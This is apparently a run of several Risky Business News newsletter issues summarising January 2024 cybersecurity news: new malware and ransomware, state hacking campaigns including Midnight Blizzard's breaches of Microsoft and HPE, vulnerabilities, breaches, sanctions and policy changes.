Rage Stealer: CyFirma researchers have discovered a new infostealer used in the wild. The stealer was created by a threat actor named "nsper" and is currently advertised on Telegram channels under names such as Rage Stealer, xStealer, and Priv8 Stealer.
RADX RAT: Russian security firm FACCT has discovered a new remote access trojan named RADX that is currently being used in attacks targeting Russian companies. Just like most of these things, the RAT is being advertised on underground forums.
Albabat ransomware: Fortinet researchers have published a report on Albabat, or White Bat, a new ransomware strain they've spotted in the wild. Albabat is written in Rust, was first seen in the wild in November 2023, and appears to target home users, per Broadcom.
Sponsor Section
Island is an enterprise browser that embeds access policies, data protection, and security controls to create a safe environment that works on unmanaged as well as managed endpoints. Take a look at Island's essential features below [PDF].
APTs, cyber-espionage, and info-ops
Midnight Blizzard: Microsoft has published a technical report describing how Russian APT group Midnight Blizzard gained access to its corporate email servers after password-spraying a test tenant account last November. According to Microsoft, the hackers pivoted from the test tenant to its corporate environment via a legacy OAuth app that had access to both environments and with elevated privileges on the corporate environment. Former Yahoo and Facebook CSO Alex Stamos published a deep dive into Microsoft's report and rips the company a well-deserved new one for its weasely legalese.
Stately Taurus: A Chinese APT group known as Stately Taurus (Bronze President, Camaro Dragon, Earth Preta, Mustang Panda, Red Delta, Luminous Moth) is conducting cyber-espionage campaigns targeting Myanmar's Ministry of Defence and Foreign Affairs. The campaign is taking place as a coalition of three rebel groups have taken control of the northern Shan state from the Myanmar military junta. Chinese officials previously expressed concern regarding the war's effect on trade routes and security around the China-Myanmar border.
UNC5221's WIREFIRE: QuoIntelligence has discovered a new version of WIREFIRE, one of the web shells used by Chinese APT group UNC5221/UTA0178 in its exploitation of the recent Ivanti Connect Secure zero-days (CVE-2023-21887 and CVE-2023-46805).
Vulnerabilities, security research, and bug bounty
GitLab security update: GitLab has published security updates to address five vulnerabilities in its self-hosted solution.
Panda vulnerabilities: Cybersecurity firm Sophos has discovered three vulnerabilities in the driver of fellow antivirus maker Panda Security. The vulnerabilities can allow remote code execution attacks in some scenarios. Sophos says it discovered the bugs after a customer conducted an APT simulation test.
Jenkins RCE PoC: Public proof-of-concept code has been published for the recent and pretty bad RCE vulnerability in the Jenkins CLI component.
Infosec industry
New tool—SOAPHound: Cybersecurity firm FalconForce has open-sourced a tool named SOAPHound that can be used to enumerate Active Directory environments via the Active Directory Web Services (ADWS) protocol.
New tool—TeamsBreaker: Security group ASOT has released TeamsBreaker, a tool designed for automating the sending of phishing messages to Microsoft Teams users.
New tool—PurpleLab: Security researcher Krook9d has open-sourced PurpleLabs, a web-based lab setup for cybersecurity professionals to test detection rules, simulate logs, and undertake various security tasks.
Pwn2Own Automotive: French security firm Synacktiv has won the first-ever edition of the Pwn2Own Automotive hacking contest, which was held last week in Tokyo, Japan. Contests used 49 different zero-days during the contest, earning more than $1.3 million in prizes for their efforts. Synacktiv alone took home $450,000, a third of the earnings. During the contest, researchers hacked Tesla cars, EV charging stations, and the Automotive Grade Linux operating system.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how having so much data available about Americans feels creepy, yet there is little visible harm to individuals. But there are still reasons to be worried.
This newsletter is brought to you by Material Security, the company that secures the cloud office with unified email security, user behavior analytics, and data loss prevention for Microsoft 365 and Google Workspace. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Days after Microsoft revealed a security breach by a Russian state-sponsored hacking group, Hewlett Packard Enterprise disclosed a similar breach at the hands of the same group.
In a document filed with the US Securities and Exchange Commission (SEC), HPE blamed the breach on Midnight Blizzard, a hacking group believed to be one of the cyber units operating inside Russia's Foreign Intelligence Service (SVR).
HPE says the group breached its cloud infrastructure in May of last year.
The company learned of the hack for the first time in June, but an initial investigation revealed the group only managed to collect and steal a limited number of SharePoint files.
HPE says that despite its initial containment, the group appears to have maintained access to its cloud infrastructure.
The tech giant was notified again in December, and a new investigation revealed the group managed to steal emails from some of its employees in the company's cybersecurity, go-to-market, and business departments.
The incident marks the second time that a major company spotted Midnight Blizzard stealing emails from their cybersecurity team. In its SEC disclosure, Microsoft said the group searched the emails of its cybersecurity team to look for information on itself in an attempt to learn what Microsoft knew about them.
The two SEC filings come on the heels of new SEC cybersecurity regulations that entered into effect in December and which mandate that companies listed on the stock market disclose any cybersecurity incident that may have a "material" impact on share prices and shareholders.
As legal and infosec commentator Brian in Pittsburgh points out, the new rules appear to have changed the entire cybersecurity landscape.
Both SEC disclosures paint a picture where two major tech companies hid major APT intrusions from authorities, the public, and shareholders.
Although the new SEC breach disclosure rules have been criticized by the private sector and some US lawmakers because they might overlap with other breach disclosure requirements, they appear to be more effective, as we've learned of an HPE APT intrusion the company easily buried last year.
In addition, the same SEC breach disclosure rules are also making companies disclose ransomware attacks much faster than last year. Instead of waiting for weeks, we now usually see an SEC filing days after an attack, along with additional follow-ups containing far more details about what happened than we've seen in previous years.
It's quite clear that many companies are erring on the side of caution, until they learn how they can manipulate and push on the SEC's new rules.
Breaches, hacks, and security incidents
Israeli movie theaters defacements: A Turkish hacktivist group has defaced screens inside Tel Aviv movie theaters to show images from the October 7 Hamas attack. [Additional coverage in Ynet]
Image: Ynet
Monobank DDoS attacks: A massive DDoS attack has disrupted the activities of Monobank, Ukraine's largest mobile banking operator. Disruptions were recorded over the weekend and linked to Russian "hacktivist" groups. The bank was also targeted on December 12 of last year, on the same day that Russian military hackers wiped systems at Kyivstar, the country's largest mobile operator. [Additional coverage in the Kyiv Independent]
NoName DDoS attacks: After getting absolutely ignored by the Romanian government, the pro-Kremlin "hacktivist" group NoName has spent the last two days harassing the IT teams responsible for government sites for France, Finland, and Poland.
EquiLend cyber incident: Securities lending EquiLend has shut down its IT systems in the aftermath of a cybersecurity incident. The incident took place on January 22. The company told customers it may take several days to restore services. EquiLend serves some of the world's largest banks and stock markets, and its NGT platform handles more than $2.4 trillion in securities transactions each month.
Veolia ransomware incident: The North American branch of water and waste management company Veolia has suffered a ransomware attack [archived].
AerCap ransomware incident: Aircraft leasing company AerCap has confirmed that it suffered a ransomware attack on January 17. In documents filed with the SEC, the company says it regained full control over its IT systems, and it's in the process of investigating what data was stolen. The company is the first victim listed on the dark web leak site of a new ransomware gang named Slug. AerCap is the world's largest aircraft leasing company, operating out of the US and Ireland.
Planeta hack: A pro-Ukrainian hacktivist group named the BO Team has hacked and wiped 280 servers at one of Russia's space and meteorology research centers. Ukraine's Defence Intelligence Main Directorate (GUR) says the hack crippled the center's activity of processing satellite data for Russia's Defense Ministry and Ministry of War. Ukrainian officials say the hackers destroyed 2 PB of data and crippled the activity of the center's expensive supercomputers.
Major Indian mobile data leak: A threat actor named CyboDevil is selling a giant database that allegedly contains the data of more than 750 million Indian nationals. According to security firm CloudSEK, the data appears to have been aggregated from multiple Indian mobile operators. The threat actor claims the database contains the personal details of 85% of India's population. The data is being advertised in several places, such as Telegram and underground hacking forums. [Additional coverage in Scroll.in]
Image: CloudSEK
General tech and privacy
Firefox 122: Mozilla has released Firefox 122. New features and security fixes are included. The biggest updates are improvements to the browser's built-in translator and support for passkeys on macOS.
Passkeys on Twitter: Twitter has announced support for passkeys on iOS devices. This is available for both free and paid users alike.
Pixel update issues: Google paused the January 2024 Google Play system update after the patch started causing storage issues on Pixel devices. [Additional coverage in AndroidPolice]
New Meta teen protections: Meta is rolling out an update to its Instagram and Facebook Messenger services to block strangers from sending direct messages to underage children (under 16/18, depending on the country). Starting this week, accounts for children will only be able to receive messages from individuals in their friend list or phone address book. Meta is rolling out the changes two days before its executives are set to testify in front of a US Senate hearing that will address child safety on social media.
Ring: Amazon's Ring security camera service announced that it will stop honoring law enforcement requests to access data without a court warrant.
Telegram, criminal's safe haven: Dutch TV station NOS reports, citing Dutch police sources, that Telegram is barely responding to requests to take down Telegram channels advertising drugs.
Apple-v-NSO lawsuit: A US judge has denied an NSO Group request to dismiss a lawsuit filed by Apple. The American company sued the Israeli spyware maker in November 2021 in an attempt to obtain a court order to prevent NSO from developing iPhone exploits. A US judge shot down NSO Group's attempts to dismiss the US lawsuit and move it to its home turf in Israel. [Additional coverage in 9to5Mac]
Apple EU changes: With the upcoming release of iOS 17.4, Apple will allow alternative app stores to be installed on EU devices. The update is part of the company's larger set of changes designed to comply with the EU Digital Markets Act (DMA). Other changes include free access to the iPhone's NFC chip to support third-party payment solutions and the ability for browser makers like Google, Mozilla, and Microsoft to use their own browser engines instead of Safari's standard WebKit. Users will also have for the first time, the ability to side-load apps on iOS, similar to Android.
Government, politics, and policy
Incoming Bideo EO on personal data transfers:Bloomberg reports that the White House is preparing to issue an executive order to ban data aggregators from selling American citizens' data overseas. We'll have more when the EO comes out.
NSO lobbying in Washington: Israeli spyware maker NSO Group has amped up its Washington lobbying efforts in an attempt to get itself off the US sanctions list. The company has recently released a transparency report and is using its role in the Hamas war as a way to prove its usefulness for government operations. NSO officials say that as part of their compliance work, they have terminated six customer accounts following reports of human rights abuse and product misuse. [Additional coverage in Wired]
NCSC warning on AI: The UK's NCSC has published an advisory warning that over the course of the next two years, AI technologies will lead to an increase in the efficacy of cyber operations, such as ransomware, social engineering, reconnaissance, and others.
ACSC guidance on AI: Australia's ACSC, together with its Five Eyes counterparts, has published guidance on how to use AI systems securely.
BabakovLeaks fallout: Back in August 2023, a pro-Ukrainian hacktivist group named Cyber Resistance hacked and leaked emails from Oleksandr Babakov, deputy chairman of the Russian State Duma. Months later, journalists from InfoNapalm have sifted through the data and found Russian insiders in Serbian politics and a Russian campaign to influence EU news media.
Belarus changes military doctrine: The Belarusian government is updating its military doctrine to allow for the use of military force in response to destructive cyber attacks. A similar provision exists in the NATO treaty. Russian policy expert OlegShakirov points out that no such provision currently exists in Russian military doctrine. The new Belarusian military doctrine also includes a provision to allow the country to use nuclear weapons. Russia sent tactical nuclear weapons to Belarus in May 2023. [Additional coverage in Belarus News]
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Ivan Dwyer of Material Security about how it makes sense to view office productivity suites as an organisation's critical infrastructure.
Cybercrime and threat intel
Trickbot author sentenced: A US judge has sentenced a Russian national to five years and four months in prison for his role in developing and deploying the Trickbot malware. Vladimir Dunaev developed browser modifications that aided Trickbot in stealing browser credentials and deploying additional malware on infected computers. Dunaev was arrested in late 2021 after getting stuck in South Korea due to COVID-19 travel restrictions. He was extradited to the US and charged a month later.
Scattered Spider member detained: US authorities have detained a 19-year-old from Florida on charges of wire fraud, aggravated identity theft, and stealing $800,000 worth of cryptocurrency from five victims. Noah Michael Urban operated online under nicknames such as "Sosa," "King Bob," and "Anthony Ramirez." One source has told Risky Business that Urban is suspected to be an affiliate of the Scattered Spider group.
TLO admin charged: US prosecutors have charged and filed an arrest warrant for a Baltimore man suspected of running an underground cybercrime service. Chouby Charleron allegedly ran TLO, a Telegram bot that allowed other threat actors to purchase the personal data of any American citizens for prices between $15 and $25. The service gained a reputation in underground circles for its accuracy and was widely used for doxxing, financial fraud, and swatting.
GitLab exposure: More than 5,300 GitLab servers are currently exposed on the internet and are vulnerable to a vulnerability that allows threat actors to reset passwords and hijack admin accounts. Tracked as CVE-2023-7028, the vulnerability was patched on December 11, last year. Most of the vulnerable servers are located in the US, Germany, Russia, and China, according to a scan performed by the Shadowserver Foundation. GitLab admins and users can mitigate the attack without patching by enabling 2FA for their accounts. Proof of concept code has been available online since the day of the patch, and exploitation has already taken place.
Image: Shadowserver Foundation
Qwiklabs abuse: Indian security firm CloudSEK looks at a payment scam operation that abuses the Qwiklabs cloud platform for its infrastructure.
Malvertising network: The same CloudSEK team looks at a massive malvertising campaign that is redirecting users to a network of more than 9,000 malicious domains.
Game hacks: AhnLab researchers have found several gaming-related hacks that secretly install a crypto-miner on users' devices. 2011 called! It wants its malware distribution tactics back.
Insider threats report: Security firm Securonix has published its 2024 Insider Threat Report, based on a survey of 450 cybersecurity professionals on the nature of insider threat challenges faced by organizations.
2023 malware report: ANY.RUN has published a report on the malware trends of 2023. The awards go to loaders (for the most popular malware family) and Redline (for the most popular malware).
2023 ransomware report: The number of victims listed on ransomware portals grew by 80% in 2023, with ransomware operations returning to their 2021 levels before Russia's invasion of Ukraine. The most prolific group last year was the LockBit gang, which listed more than 1,000 victims on its leak site. This marks the second year that LockBit topped the chart after it took the title from the now-defunct Conti gang in 2022. According to GuidePoint Security, US-based organizations accounted for 49% of all observed ransomware attacks in 2023. (Broadcom's Symantec also has one of these reports out, but they have AlphV on top over a different time period.)
Image: GuidePoint Security
Malware technical reports
CherryLoader: Arctic Wolf has observed a new loader, dubbed CherryLoader, written in Go and used in recent intrusions.
AllaKore RAT: BlackBerry looks at a recent AllaKore RAT campaign targeting Mexican banks and Cryptocurrency platforms.
Faust ransomware: Fortinet researchers have discovered a new ransomware strain named Faust. The ransomware appears to be another variant of the old Phobos ransomware, whose source code was leaked online years ago.
Sponsor Section
A deep dive into what's new with Material Security's Phishing Protection product: New detections, response UX boosters, and more actionable reports.
APTs, cyber-espionage, and info-ops
APT10: Japanese security firm Itochuci has published a report on APT10's LODEINFO malware.
Blackwood: A Chinese cyber-espionage group named Blackwood has used adversary-in-the-middle (AitM) attacks to hijack updates for legitimate software applications. The AitM attacks intercepted and modified updates for Chinese software such as Tencent QQ, Sogou Pinyin, and WPS Office to deliver a new backdoor named NSPX30. Security firm ESET says the group has been active since 2018 and has targeted organizations and individuals in China, Japan, and the UK. Blackwood is now the third Chinese APT that was observed in recent years with AitM traffic interception capabilities, after LuYou and Evasive Panda.
IRGC groups: Recorded Future has published a report providing a summary of four organizations with links to Iran's Islamic Revolutionary Guard Corps (IRGC) and how some of their contractors have been linked to espionage, cybercrime, and influence operations overseas—eventually also landing on the US sanctions list.
Predatory Sparrow: Wired's Andy Greenberg has published an article covering all the Predatory Sparrow hacks that targeted Iranian organizations over the past two years.
DPRK operations in SK: South Korea's NIS intelligence agency says they've seen North Korean groups attempt to incorporate AI in their operations. Officials also said that the DPRK accounts for 80% of all cyberattacks targeting South Korean government networks. [Additional coverage in KBS and Yonhap News]
DPRK crypto-hacks: In 2023, North Korean hackers stole $1 billion worth of crypto assets from 20 organizations, according to data collected by Chainalysis. DPRK groups stole less money than the year before, but they conducted more intrusions, down from $1.7 billion stolen assets stolen across 15 incidents in 2022. Overall, 2023 was a bad year for all crypto thieves, who only stole $1.7 billion across 231 incidents, way below the $3.7 billion stolen in 2022.
Image: Chainalysis
Vulnerabilities, security research, and bug bounty
Cisco security updates: Cisco has released or updated five security advisories for various products.
Jenkins RCE: The Jenkins automation server has released a security update to patch a major vulnerability. Tracked as CVE-2024-23897, the vulnerability has a severity rating of 9.8/10 and impacts the app's CLI component. The Jenkins team has confirmed various attack scenarios that can allow attackers to retrieve cryptographic keys, delete files, or run malicious code through various methods. If patches can't be installed, the vulnerability can be mitigated by disabling the CLI component. The vulnerability was discovered by Sonar researcher Yaniv Nizry.
GKE Sys:All: Cloud security firm Orca has discovered a security flaw in the Google Kubernetes Engine (GKE) that could be abused to hijack GKE clusters. Named Sys:All, the issue arises from admins misunderstanding the role of the system:authenticated user group in GKE deployments.
"The loophole is not exactly a vulnerability but more an extremely prevalent misconfig stemming from widespread misconception around GKE – many seem to assume that the system:authenticated group in Google Kubernetes Engine includes only verified and deterministic identities. It actually includes any Google-authenticated account, even those outside the organization. This basic misunderstanding leads administrators to regularly enable the group with overly permissive roles, something they wouldn’t do if they realized what the system:authenticated group actually was."
"Orca conservatively estimates that as many as 1 million GKE clusters are vulnerable solely because of this loophole. A brief scan by the team uncovered over 250,000 vulnerable GKE clusters in the wild, some of which contain secrets that would enable lateral movement."
Leaky API keys: API security platform Escape says it found more than 18,000 API keys exposed on the internet after scanning 189.5 million URLs.
35-year-old vulnerability: JFrog researchers look at a duo of libX11 vulnerabilities (a DoS and RCE) that can be used to attack Linux environments. The two bugs impact all libX11 versions dating back to 1989.
GTB vulnerabilities: A group of security researchers going by the "Adepts of 0xCC" have published a write-up on two vulnerabilities that can be used to hack into GTB Central Console, a data loss prevention platform.
Triton vulnerability: Security firm ProtectAI has found a vulnerability in the API of Triton, a type of inference server used by the AI/ML industry. PoC code is available on GitHub.
Chrome zero-day PoC: A proof-of-concept exploit was released for CVE-2022-4262, a Chrome zero-day patched back in December 2022.
Zyxel PoC: SSD has published proof-of-concept for a pre-auth RCE in Zyxel routers. SSD didn't say if the bugs were reported or patched.
Infosec industry
Industry moves: Former NSO Group executives, including the former CEO Shalev Hulio, launched a new company named Dream Security. The new company allegedly hired 13 former NSO Group employees and secured a $33 million round of venture capital funding. According to Hulio, Dream Security will provide cybersecurity defenses for critical infrastructure entities. Hulio first touted Dream Security back in October 2022, shortly after leaving NSO in August 2022. [Additional coverage in The Intercept]
New tool—SECurityTr8Ker: Security researcher Pancak3lullz has released a tool named SECurityTr8Ker that can monitor the SEC's RSS feed for 8K and 6K filings for cybersecurity incidents. The script currently powers a Twitter account here. There's also another account that tracks these things here and a different web portal for tracking SECdisclosures here.
New tool—cvemap: Project Discovery has open-sourced a tool named cvemap, a CLI utility designed to provide a structured and easily navigable interface to various vulnerability databases.
Image: Project Discovery
Risky Business Podcasts
In this podcast episode of the Seriously Risky Business series, Patrick Gray and Tom Uren talk about how the SEC’s new disclosure rules that mean companies have four days to report cyber security incidents once they’ve formally decided that they are material. So far, companies are very much erring on the side of caution.
They also look at the criticism of the CSRB’s board composition. Tom thinks these critiques are misguided. The cyber security landscape is so fractured that if the board were made up of faceless bureaucrats it would get very limited traction.
This newsletter is brought to you by Material Security, the company that secures the cloud office with unified email security, user behavior analytics, and data loss prevention for Microsoft 365 and Google Workspace. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Australia, the UK, and the US have sanctioned a Russian national for his role in a ransomware attack on Australian private insurance provider Medibank in October 2022.
Identified as Alexander Ermakov, he is believed to be connected to the REvil ransomware operation, where he allegedly operated under pseudonyms such as GustaveDore, JimJones, Blade_Runner, and aiiis_ermak. Ermakov is believed to be 33 and a resident of Moscow.
Officials say Ermakov was a "pivotal" and "key actor" in REvil's attack on Medibank, considered one of Australia's worst cybersecurity incidents.
The REvil gang breached the private insurer's network, stole data, encrypted systems, and then leaked portions of the data on the dark web in an attempt to pressure the company into paying a $10 million ransom demand.
More than 9.7 million patient records were stolen in the attack, and more than 480,000 health claims were posted on REvil's dark web leak site.
The records contained names, dates of birth, Medicare numbers, and sensitive medical information. Some of the leaked health claims contained information about sensitive procedures, such as abortions and mental health treatment.
Officials say Ermakov was directly involved in breaching and releasing the data.
At the time, the hack and the appalling extortion tactics triggered an aggressive response from the Australian government, which set up a permanent operation to hunt down cybercriminal syndicates.
Named Operation Aquila, the initiative is a joint effort with personnel from both the Australian Federal Police (AFP) and the Australian Signals Directorate (ASD).
Ermakov is the first individual tracked down by Aquila and the first cybercriminal to be sanctioned by the Australia government.
The joint AU-UK-US sanctions include both financial sanctions and travel bans. Australian officials warned that anyone breaking faces up to ten years in an Australian prison.
Photos of Alexander Ermakov
Breaches, hacks, and security incidents
DDoS attacks on Romanian govt sites: Pro-Kremlin hacktivist group NoName launched DDoS attacks on several Romanian government websites. The impact was extremely minor, and local authorities barely noticed the downtime.
Trezor breach: Cryptocurrency wallet service Trezor has confirmed that a threat actor gained access to the data of 66,000 customers after gaining access to its support ticketing portal. Trezor says all users who registered an account on its support portal since December 2021 are affected. The company says the hacker used data from the portal to contact 41 customers and attempt to obtain data about their wallet recovery seeds.
Trello leak: A threat actor is selling a list of more than 15 million emails that were scraped from internet-exposed Trello boards.
LoanDepot ransomware aftermath: American mortgage provider LoanDepot has confirmed that the data of almost 16.6 million customers was stolen in a ransomware attack at the start of the year. In an update provided to customers and shareholders, LoanDepot says it made significant progress in restoring loan servicing systems that were impacted by the attack. The company is the fourth major US mortgage and real estate insurance provider that was hit by a cyberattack over the past months. Similar incidents have also affected Mr. Cooper, Fidelity National Financial, and First American Financial.
Jason's Deli cred-stuffing attack: American fast food chain Jason's Deli says that threat actors gained access to more than 344,000 customer accounts on its reward points portal after a successful credential-stuffing attack.
SEC Twitter hack: The SEC has published a final report on how its Twitter account got hacked. It was SIM swapping and a lack of MFA, as initially suspected.
MOAB leak: Security researcher Bob Dyachenko has discovered a database exposed online that contains more than 26 billion user records. The leaky database appears to aggregate data from more than 3,800 past data breaches. Dyachenko was unable to identify the database's owner and named the leak the Mother of all Breaches (MOAB) since it's currently the biggest leak known to date. [Additional coverage in CyberNews]
Concentric Finance cyber-heist: Cryptocurrency platform Concentric Finance lost $1.6 million in assets in a security incident that took place earlier this week. The company says the attacker managed to social-engineer one of its employees and gain access to one of its wallets. Blockchain security firm CertiK linked the attack to the same threat actor who stole $2.7 million worth of crypto-assets from OKX in December of last year.
GMEE cyber-heist: The operators of the GMEE (or Gamee) cryptocurrency token lost $15 million worth of assets after hackers exploited one of its smart contracts. All the stolen tokens were from the project's reserve, and no user-owned tokens were affected. The token lost 40% of its value in the aftermath of the hack. [Additional coverage in the DailyCoin]
Pegasus in Togo: Traces of the Pegasus spyware was found on phones of two independent Togolese journalists. The infections took place throughout 2021 and were discovered by the security team of Reporters Without Borders. The organization was providing assistance to the two journalists after they were arrested in December after reporting on a theft from the home of one of the country's ministers. According to a report from French newspaper Le Monde, the Togo government was a customer of NSO Group at the time of the infections.
General tech and privacy
Meta will let EU users unlink its services: Social media company Meta will let EU users unlink its services from one another.
"People using Instagram and Facebook in the EU, EEA and Switzerland will soon be offered several choices about how they would like to manage their experiences across Meta products. We are offering these choices to address the requirements of the DMA, which enter into force in March 2024."
First IPv4 sunset date: The Czech government has announced that it will stop providing its services via IPv4 on June 2, 2032, making this the first unofficial IPv4 sunset date.
Amazon fined in France: French privacy watchdog CNIL has fined American retail giant Amazon €32 million for using "an excessively intrusive system for monitoring employee activity and performance" at its warehouses across the country. The fine also covers the company's use of video surveillance without warning employees and for not securing the accounts used to access the surveillance system.
Apple fined in Russia: The Russian government has fined Apple $13.5 million for not allowing third-party payment systems on the iOS App Store.
iOS Stolen Device Protection: Apple's new Stolen Device Protection feature is now live in the company's latest iOS 17.3 release.
Chrome 121: Google has released version 121 of its Chrome browser. See here for security patches and webdev-related changes. The biggest changes in this release include the addition of an AI-based tab organizer and theme generator, a new side panel, and the start of Chrome's third-party cookie deprecation procedures.
Government, politics, and policy
Russia's emoji ban: A Russian Duma member has proposed a law that will ban roughly two dozen emojis on smartphones sold in Russia. The ban covers LGBTQ-themed emojis that depict same-sex families, pregnant men, bearded women, and men in wedding dresses, among others. The law was proposed by Alexey Zhuravlev, a member of the Rodina party. It comes after a Russian judge outlawed LGBTQ activism, and authorities started a countrywide crackdown on members of the LGBTQ community. This is the second time the Russian Duma is looking at a law to ban same-sex emojis after a similar attempt in 2015. [Additional coverage in Rossiyskaya Gazeta]
CISA Director swatted: CISA Director Jen Easterly was the target of a swatting attempt, according to a report from The Record, citing sources inside CISA. The attacker claimed gunfire was heard from Easterly's house on the night of December 30, last year. The CISA official was unharmed after Arlington County Police arrived on scene and determined no shooting had occurred. The incident comes as a large number of US officials have been swatted over the past weeks, with twoincidents targeting the White House itself.
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Ivan Dwyer of Material Security about how it makes sense to view office productivity suites as an organisation's critical infrastructure.
Cybercrime and threat intel
Killnet leader interview: Russian news outlet Gazeta has published an interview with BTC, the new leader of the pro-Kremlin hacktivist group Killnet. The outlet previously doxed the gang's former leader, 30-year-old named Nikolai Nikolaevich Serafimov, known as Killmilk. BTC took credit for the destructive attack that crippled Ukrainian mobile operator Kyivstar. Ukrainian officials previously attributed the attack to Sandworm, a GRU-managed APT group.
WS: Fortinet has published a profile of WS, a threat actor that has published nine malicious Python libraries via the PyPI portal over the past years.
Fake loan apps: Indian security firm CyFirma looks at a campaign from a Pakistani threat actor targeting Indians with fake loan apps infected with malware.
npm malware caught stealing SSH keys: ReversingLabs researchers have discovered two npm libraries designed to steal SSH keys from infected developer machines and upload the data to a GitHub repository.
"Fortunately, the reach of this campaign was limited. ReversingLabs observed different accounts publishing warbeast2000 and kodiak2k on npm. The warbeast2000 package was downloaded a little less than 400 times, whereas the kodiak2k was downloaded around 950 times."
Ransomware in 2023: The number of ransomware victims listed on dark web leak sites in 2023 was 4,667, a figure 84% higher than the number of victims listed in 2022.
Malware technical reports
BianLian ransomware: Palo Alto Networks researchers have found a shared tool used by the BianLian and the Makop ransomware gangs.
Cactus ransomware: ShadowStackRE has published an analysis of Cactus, a ransomware operation that launched in May of last year.
Kasseika ransomware: Trend Micro researchers have discovered a new ransomware operation named Kasseika. The ransomware was first spotted in 2023 and is one of the rare groups that uses the Bring-Your-Own-Vulnerable-Driver (BYOVD) approach for its intrusions. Kasseika becomes the fourth ransomware strain to use BYOVD after the likes of Akira, BlackByte, and AvosLocker. Trend Micro says the group appears to resemble the BlackMatter ransomware operation, which shut down in late 2021.
NS-Stealer: Trellix has published a technical report on a new infostealer written in Java and named NS-Stealer that can steal web browser data and upload it to Discord bot channels.
Godzilla webshell: Trustwave looks at Godzilla, a JSP webshell that the company has recently saw being planted on hacked Apache ActiveMQ hosts.
DarkGate: Kroll's security team has published a report on the DarkGate malware's encoding system.
SystemBC: The same team also published a report on the C2 server system used by the SystemBC malware family.
New macOS malware: Kaspersky has discovered a suite of cracked and pirated macOS apps secretly installing infostealers on user devices.
VexTrio: Infoblox has published a report on VexTrio, a TDS platform that launched in 2017 and currently redirects traffic from hacked devices between more than 60 cybercrime operations. Some of its customers include ClearFake and SocGolish, two other TDS platforms, showing how these groups would often collaborate with each other, rather than compete.
Sponsor Section
A deep dive into what's new with Material Security's Phishing Protection product: New detections, response UX boosters, and more actionable reports.
APTs, cyber-espionage, and info-ops
UAC-0050: CERT-UA has published a report on UAC-0050's latest spear-phishing campaign targeting Ukrainian government agencies. The group has been at it for a year now, with non-stop attacks aimed at Ukrainian agencies. On the same note, AhnLab also spotted a SmokeLoader campaign targeting Ukrainian government organizations as well. Unclear which threat actor was behind this one.
ScarCruft: North Korean hacking group ScarCruft (APT37) has conducted a spear-phishing campaign that targeted members of the South Korean cybersecurity community. Spotted by SentinelOne, the campaign took place throughout November and December of 2023. Besides infosec professionals, the campaign also targeted media organizations and high-profile experts in North Korean affairs. ScarCruft's final payload was the group's typical malware, the RokRAT remote access trojan.
Lazarus: AhnLab analyzes a new DLL side-loading technique used by the Lazarus APT group in attacks targeting South Korean organizations.
OceanLotus: Chinese security firm CrackME looks at recent OceanLotus operations targeting Chinese organizations.
Vulnerabilities, security research, and bug bounty
MavenGate research: More than 6,100 Java libraries listed on the MavenCentral package repository appear to have been abandoned by their authors. The libraries use expired domains for their admin accounts, which can be registered by attackers to hijack the library itself. Security firm Oversecured says some of the libraries are dependencies in some of today's most popular Java projects, including apps from companies like Amazon, Google, Facebook, Microsoft, Adobe, and Netflix.
Apple patches WebKit zero-day: Apple has released security updates for all its products to patch a new zero-day (CVE-2024-23222) in its WebKit browser engine. Patches were made available for iOS, macOS, iPadOS, tvOS, and Safari. The company also backported fixes for two zero-days (CVE-2023-42916 & CVE-2023-42917) it patched in November of last year to its older generation of devices. This is Apple’s first zero-day this year after having patched 20 zero-days in 2023.
Splunk security updates: Splunk has released security patches to fix five vulnerabilities in its products.
Fortra security update: Fortra has published a patch for its GoAnywhere file-sharing server. The security update fixes an authentication bypass tracked as CVE-2024-0204 discovered by two software engineers from Spark Engineering Consultants. A PoC has been published here.
WifiKey PoC: SSD has published proof-of-concept for a still-unpatched pre-auth RCE vulnerability in WifiKey's AC Gateway product.
Bitcoin ATM vulnerabilities: IOActive researchers have found a series of vulnerabilities that could allow a physical attacker to steal user assets from Lamassu Douro Bitcoin ATMs.
Confluence exploitation: Threat actors are exploiting a recently patched Atlassian Confluence vulnerability. Tracked as CVE-2023-22527, the vulnerability has a severity rating of 10/10 and allows for unauthenticated remote code execution attacks. According to the Shadowserver Foundation, attacks began on January 19, three days after Atlassian released a patch. After the attacks got underway, technical write-ups and proof-of-concept code were published by several Chinese and Vietnamese researchers.
Ivanti exploitation: According to the same Censys, 412 (of more than 26,000) Ivanti Connect Secure VPN appliances are compromised with a backdoor after being recently exploited using two new zero-days (CVE-2023-46805 & CVE-2024-21887).
VMWare vCenter exploitation: Censys researchers say they have seen 3,541 VMWare vCenter servers exposing their web panel on the internet, but only 293 of these were running the DCERPC service. The service contains a vulnerability that has been secretly exploited in the wild by a Chinese APT group since late 2021. VMWare released patches for the vulnerability (CVE-2023-34048) in October of last year.
Image: The Shadowserver Foundation
Infosec industry
Industry moves: F5 has named Samir Sherif as its new Senior VP and CISO. Sherif previously served as CISO at Absolute Software and Imperva. Sherif takes over the CISO role from Gail Coury, who is retiring in March. [Additional coverage in SecurityWeek]
Pwn2Own Automotive 2024: The Pwn2Own Automotive 2024 hacking contest is taking place in Tokyo this week. The contest has rewards of up to $1 million. The full schedule is here.
New tool—GraphStrike: Pen-testing company Red Siege has open-sourced a tool named GraphStrike to enable the use of Cobalt Strike Beacons via the Microsoft Graph API for HTTPS C2 communications.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how Stuxnet was an 'inevitability gamechanger,' how much we now know about the operation, and how much the Dutch government should have known at the time.
This newsletter is brought to you by Material Security, the company that secures the cloud office with unified email security, user behavior analytics, and data loss prevention for Microsoft 365 and Google Workspace. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Russian state-sponsored hackers have breached Microsoft's internal network and have stolen emails from the company's senior leadership, legal, and cybersecurity teams.
The intrusion began in late November of 2023 and lasted until January 13, when Microsoft kicked the hackers off its network.
The Redmond-based giant attributed the attack to Midnight Blizzard, one of the cyber units inside Russia's Foreign Intelligence Service (SVR).
